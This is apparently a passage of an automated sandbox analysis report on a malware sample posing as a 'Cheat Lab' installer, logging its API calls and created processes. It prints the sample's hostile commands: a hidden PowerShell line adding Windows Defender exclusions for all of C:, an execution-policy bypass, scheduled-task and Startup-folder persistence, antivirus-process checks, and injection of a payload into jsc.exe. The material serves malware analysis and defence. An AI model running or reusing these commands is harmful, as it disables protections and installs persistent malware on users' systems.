                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe TID: 1904Thread sleep time: -676100000s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exeLast function: Thread delayed
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exeLast function: Thread delayed
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exeLast function: Thread delayed
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exeLast function: Thread delayed
                        Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: 11_2_00007FF7BADC412C FindFirstFileExW,11_2_00007FF7BADC412C
                        Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 16_2_00404399 FindFirstFileW,FindClose,SetLastError,CompareFileTime,16_2_00404399
                        Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 16_2_00403C8F FindFirstFileW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetCurrentDirectoryW,SetFileAttributesW,RemoveDirectoryW,16_2_00403C8F
                        Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 16_2_00403DA4 FindFirstFileW,FindClose,SetFileAttributesW,DeleteFileW,16_2_00403DA4
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: 29_2_0095E1AC GetFileAttributesW,FindFirstFileW,FindClose,29_2_0095E1AC
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: 29_2_0095D65B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,29_2_0095D65B
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: 29_2_0095D98E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,29_2_0095D98E
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: 29_2_0096A29A FindFirstFileW,Sleep,FindNextFileW,FindClose,29_2_0096A29A
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: 29_2_00966406 FindFirstFileW,FindNextFileW,FindClose,29_2_00966406
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: 29_2_009670FE FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,29_2_009670FE
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: 29_2_0096705D FindFirstFileW,FindClose,29_2_0096705D
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: 29_2_00969DB1 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,29_2_00969DB1
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: 29_2_00969F0C SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,29_2_00969F0C
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: 29_2_008F4E68 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,29_2_008F4E68
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exeThread delayed: delay time: 100000
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exeThread delayed: delay time: 100000
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exeThread delayed: delay time: 100000
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exeThread delayed: delay time: 100000
                        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pontiac
                        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Dns
                        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\
                        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\
                        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\
                        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\
                        Source: powershell.exe, 0000000E.00000002.2417024179.0000022F33ED4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
                        Source: Carbon.pif, 0000001D.00000003.2893690929.00000000039AA000.00000004.00000020.00020000.00000000.sdmp, Carbon.pif, 0000001D.00000003.2894225231.00000000039A9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \qemu-ga.exe
                        Source: powershell.exe, 0000000E.00000002.2417024179.0000022F33ED4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
                        Source: powershell.exe, 0000000E.00000002.2417024179.0000022F33ED4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
                        Source: Carbon.pif, 0000001D.00000003.2960356253.000000000388D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior

                        Anti Debugging

                        barindex
                        Found API chain indicative of debugger detection
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifDebugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleepgraph_29-105172
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: 29_2_0096F229 BlockInput,29_2_0096F229
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: 11_2_00007FF7BADB6E5C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00007FF7BADB6E5C
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: 29_2_008F4E68 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,29_2_008F4E68
                        Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 16_2_0041BDB6 mov eax, dword ptr fs:[00000030h]16_2_0041BDB6
                        Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 16_2_0041DF79 mov eax, dword ptr fs:[00000030h]16_2_0041DF79
                        Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 16_2_0041DF34 mov eax, dword ptr fs:[00000030h]16_2_0041DF34
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: 29_2_00915038 mov eax, dword ptr fs:[00000030h]29_2_00915038
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: 11_2_00007FF7BADC8D74 GetProcessHeap,11_2_00007FF7BADC8D74
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: 11_2_00007FF7BAD8BF4C SetUnhandledExceptionFilter,_invalid_parameter_noinfo,11_2_00007FF7BAD8BF4C
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: 11_2_00007FF7BAD8BB34 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_00007FF7BAD8BB34
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: 11_2_00007FF7BADB6E5C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00007FF7BADB6E5C
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: 11_2_00007FF7BAD8C4B4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00007FF7BAD8C4B4
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: 11_2_00007FF7BAD8C698 SetUnhandledExceptionFilter,11_2_00007FF7BAD8C698
                        Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 16_2_0041A4A5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_0041A4A5
                        Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 16_2_0041CD41 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_0041CD41
                        Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 16_2_0041A60A SetUnhandledExceptionFilter,16_2_0041A60A
                        Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 16_2_0041A7C0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_0041A7C0
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: 29_2_009228E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,29_2_009228E2
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: 29_2_00910B8F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,29_2_00910B8F
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: 29_2_00910D25 SetUnhandledExceptionFilter,29_2_00910D25
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: 29_2_00910F71 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,29_2_00910F71
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeMemory allocated: page read and write | page guard

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Adds a directory exclusion to Windows Defender
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -Command "& { & 'Add-MpPreference' -ExclusionExtension '.dll', '.exe' -ExclusionPath C: -Force }
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -Command "& { & 'Add-MpPreference' -ExclusionExtension '.dll', '.exe' -ExclusionPath C: -Force }Jump to behavior
                        Bypasses PowerShell execution policy
                        Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss87C.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi86A.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr86B.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr86C.txt" -propSep " :<->: " -testPrefix "_testValue."
                        Injects a PE file into a foreign processes
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifMemory written: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exe base: 1390000 value starts with: 4D5A
                        Writes to foreign memory regions
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifMemory written: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exe base: 1390000
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifMemory written: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exe base: 11ED000
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: 29_2_009518E3 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,29_2_009518E3
                        Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 16_2_004025A9 ShowWindow,BringWindowToTop,ShellExecuteExW,WaitForSingleObject,CloseHandle,16_2_004025A9
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: 29_2_0090F64C GetForegroundWindow,FindWindowW,IsIconic,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,ShowWindow,29_2_0090F64C
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: 29_2_0095E996 mouse_event,29_2_0095E996
                        Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exe C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exe" "C:\Program Files\Cheat Lab Inc\Cheat Lab\configJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss87C.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi86A.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr86B.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr86C.txt" -propSep " :<->: " -testPrefix "_testValue."Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -Command "& { & 'Add-MpPreference' -ExclusionExtension '.dll', '.exe' -ExclusionPath C: -Force }Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k cmd < Roommates & exit
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe"
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c mkdir 28945
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Dns + Pontiac + Milfhunter + Ruling + Supervisor 28945\Carbon.pif
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Entered + Conferences 28945\w
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pif 28945\Carbon.pif 28945\w
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 localhost
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifProcess created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exe C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exe
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe"
                        Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noprofile -noninteractive -executionpolicy bypass -file "c:\users\user\appdata\local\temp\pss87c.ps1" -propfile "c:\users\user\appdata\local\temp\msi86a.txt" -scriptfile "c:\users\user\appdata\local\temp\scr86b.ps1" -scriptargsfile "c:\users\user\appdata\local\temp\scr86c.txt" -propsep " :<->: " -testprefix "_testvalue."
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "register-scheduledtask -taskname 'y29ubmvjddc0mq==' -action (new-scheduledtaskaction -execute 'c:\users\user\appdata\roaming\discord\settings\connect.exe') -trigger (new-scheduledtasktrigger -at (get-date).addminutes(1) -once) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -dontstopifgoingonbatteries -startwhenavailable) -force"
                        Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noprofile -noninteractive -executionpolicy bypass -file "c:\users\user\appdata\local\temp\pss87c.ps1" -propfile "c:\users\user\appdata\local\temp\msi86a.txt" -scriptfile "c:\users\user\appdata\local\temp\scr86b.ps1" -scriptargsfile "c:\users\user\appdata\local\temp\scr86c.txt" -propsep " :<->: " -testprefix "_testvalue."Jump to behavior
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "register-scheduledtask -taskname 'y29ubmvjddc0mq==' -action (new-scheduledtaskaction -execute 'c:\users\user\appdata\roaming\discord\settings\connect.exe') -trigger (new-scheduledtasktrigger -at (get-date).addminutes(1) -once) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -dontstopifgoingonbatteries -startwhenavailable) -force"Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: 29_2_00951244 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,29_2_00951244
                        Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 16_2_0040493F AllocateAndInitializeSid,CheckTokenMembership,FreeSid,16_2_0040493F
                        Source: Carbon.pifBinary or memory string: Shell_TrayWnd
                        Source: connect.exe, 00000010.00000003.2498656765.0000000002880000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: @EXITMETHOD@EXITCODEShell_TrayWnd-CALLGUICTRLREGISTERLISTVIEWSORTGUICTRLCREATELISTVIEWITEMGUICTRLCREATETREEVIEWITEMGUICTRLCREATECONTEXTMENUONAUTOITEXITUNREGISTERGUICTRLCREATELISTVIEWGUICTRLCREATEMENUITEMGUICTRLCREATECHECKBOXGUICTRLCREATEMONTHCALGUICTRLCREATEPROGRESSGUICTRLCREATETREEVIEWGUICTRLCREATEGRAPHICSTRINGFROMASCIIARRAYONAUTOITEXITREGISTERGUICTRLCREATETABITEMGUICTRLSETDEFBKCOLORINIREADSECTIONNAMESGUICTRLCREATEBUTTONDLLCALLBACKREGISTERGUICTRLCREATEUPDOWNGUICTRLCREATESLIDERSTRINGREGEXPREPLACEOBJCREATEINTERFACEGUICTRLSENDTODUMMYFILECREATESHORTCUTGUICTRLCREATEINPUTSOUNDSETWAVEVOLUMEFILECREATENTFSLINKGUISETACCELERATORSGUICTRLCREATECOMBOGUICTRLSETDEFCOLORPROCESSSETPRIORITYGUICTRLSETRESIZINGSTRINGTOASCIIARRAYDRIVEGETFILESYSTEMGUICTRLCREATEDUMMYTRAYITEMSETONEVENTGUICTRLCREATERADIOWINMINIMIZEALLUNDOGUICTRLCREATEGROUPGUICTRLCREATELABELAUTOITWINSETTITLEGUICTRLSETBKCOLORAUTOITWINGETTITLEGUICTRLSETGRAPHICGUICTRLCREATEDATEGUICTRLCREATEICONGUICTRLSETONEVENTCONSOLEWRITEERRORDLLCALLBACKGETPTRGUICTRLCREATELISTTRAYITEMGETHANDLEFILEFINDFIRSTFILEGUICTRLCREATEEDITGUICTRLCREATEMENUWINMENUSELECTITEMGUICTRLSETCURSORDLLSTRUCTGETDATASTATUSBARGETTEXTFILERECYCLEEMPTYFILESELECTFOLDERTRAYITEMSETSTATEDLLSTRUCTSETDATATRAYITEMGETSTATEWINGETCLIENTSIZEGUICTRLCREATEAVIHTTPSETUSERAGENTGUICTRLCREATEPICCONTROLGETHANDLEGUIGETCURSORINFOTRAYSETPAUSEICONFILEFINDNEXTFILEINIRENAMESECTIONDLLSTRUCTGETSIZESHELLEXECUTEWAITPROCESSWAITCLOSEGUICTRLCREATETABFILEGETSHORTNAMEWINWAITNOTACTIVEGUICTRLCREATEOBJGUICTRLGETHANDLESTRINGTRIMRIGHTGUICTRLSETLIMITGUICTRLSETIMAGEINIWRITESECTIONCONTROLTREEVIEWAUTOITSETOPTIONGUICTRLSETCOLORDLLSTRUCTGETPTRADLIBUNREGISTERDRIVESPACETOTALGUICTRLSETSTATEWINGETCLASSLISTGUICTRLGETSTATEFILEGETSHORTCUTDLLSTRUCTCREATEPROCESSGETSTATSCONTROLGETFOCUSDLLCALLBACKFREEGUICTRLSETSTYLEFILEREADTOARRAYTRAYITEMSETTEXTCONTROLLISTVIEWTRAYITEMGETTEXTFILEGETENCODINGFILEGETLONGNAMEGUICTRLSENDMSGSENDKEEPACTIVEDRIVESPACEFREEFILEOPENDIALOGGUICTRLRECVMSGCONTROLCOMMANDSTRINGTOBINARYWINMINIMIZEALLSTRINGISXDIGITTRAYSETONEVENTFILESAVEDIALOGDUMMYSPEEDTESTCONTROLGETTEXTMOUSECLICKDRAGGUICTRLSETFONTMOUSEGETCURSORWINGETCARETPOSCONTROLSETTEXTTRAYITEMDELETESTRINGTRIMLEFTDRIVEGETSERIALBINARYTOSTRINGGUICTRLSETDATAINIREADSECTIONUDPCLOSESOCKETCONTROLDISABLETRAYCREATEMENUTCPCLOSESOCKETDLLCALLADDRESSFILEGETVERSIONGUIREGISTERMSGTRAYSETTOOLTIPTRAYCREATEITEMDRIVEGETDRIVESTRINGISASCIISTRINGCOMPARESTRINGISALPHAPROCESSEXISTSSTRINGREVERSESTRINGSTRIPCRSPLASHIMAGEONGUICTRLSETTIPGUISTARTGROUPCONTROLGETPOSFILEGETATTRIBADLIBREGISTERDRIVESETLABELGUICTRLDELETEFILECHANGEDIRFILEWRITELINEPIXELCHECKSUMDRIVEGETLABELGUICTRLSETPOSGUISETBKCOLORPIXELGETCOLORSTRINGISDIGITSTRINGISFLOATWINWAITACTIVESTRINGISALNUMSTRINGISLOWERSTRINGISSPACEGUISETONEVENTSTRINGREPLACESTRINGSTRIPWSCONTROLENABLESTRINGISUPPERWINGETPROCESSFILESETATTRIBCONTROLFOCUSFILEREADLINEPROCESSCLOSEGUISETCURSORSPLASHTEXTONSTRINGFORMATTRAYSETSTATESTRINGREGEXPCONTROLCLICKSHELLEXECUTETRAYSETCLICKWINWAITCLOSEHTTPSETPROXYDRIVEGETTYPEWINGETHANDLECONSOLEWRITEGUIGETSTYLECONTROL
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: 11_2_00007FF7BADBD3E0 cpuid 11_2_00007FF7BADBD3E0
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: GetLocaleInfoW,11_2_00007FF7BADC89C8
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,11_2_00007FF7BADC8918
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,11_2_00007FF7BADC8AF4
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,wcschr,wcschr,GetLocaleInfoW,11_2_00007FF7BADC80C0
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: try_get_function,GetLocaleInfoW,11_2_00007FF7BADB7D50
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: EnumSystemLocalesW,11_2_00007FF7BADC840C
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: EnumSystemLocalesW,11_2_00007FF7BADC84DC
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: GetLocaleInfoW,11_2_00007FF7BADC87C0
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: EnumSystemLocalesW,11_2_00007FF7BADB7718
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,11_2_00007FF7BADC8574
                        Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: GetLastError,GetLastError,wsprintfW,GetEnvironmentVariableW,GetLastError,GetEnvironmentVariableW,GetLastError,lstrcmpiW,SetLastError,lstrlenA,GetLocaleInfoW,MultiByteToWideChar,16_2_004041E0
                        Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
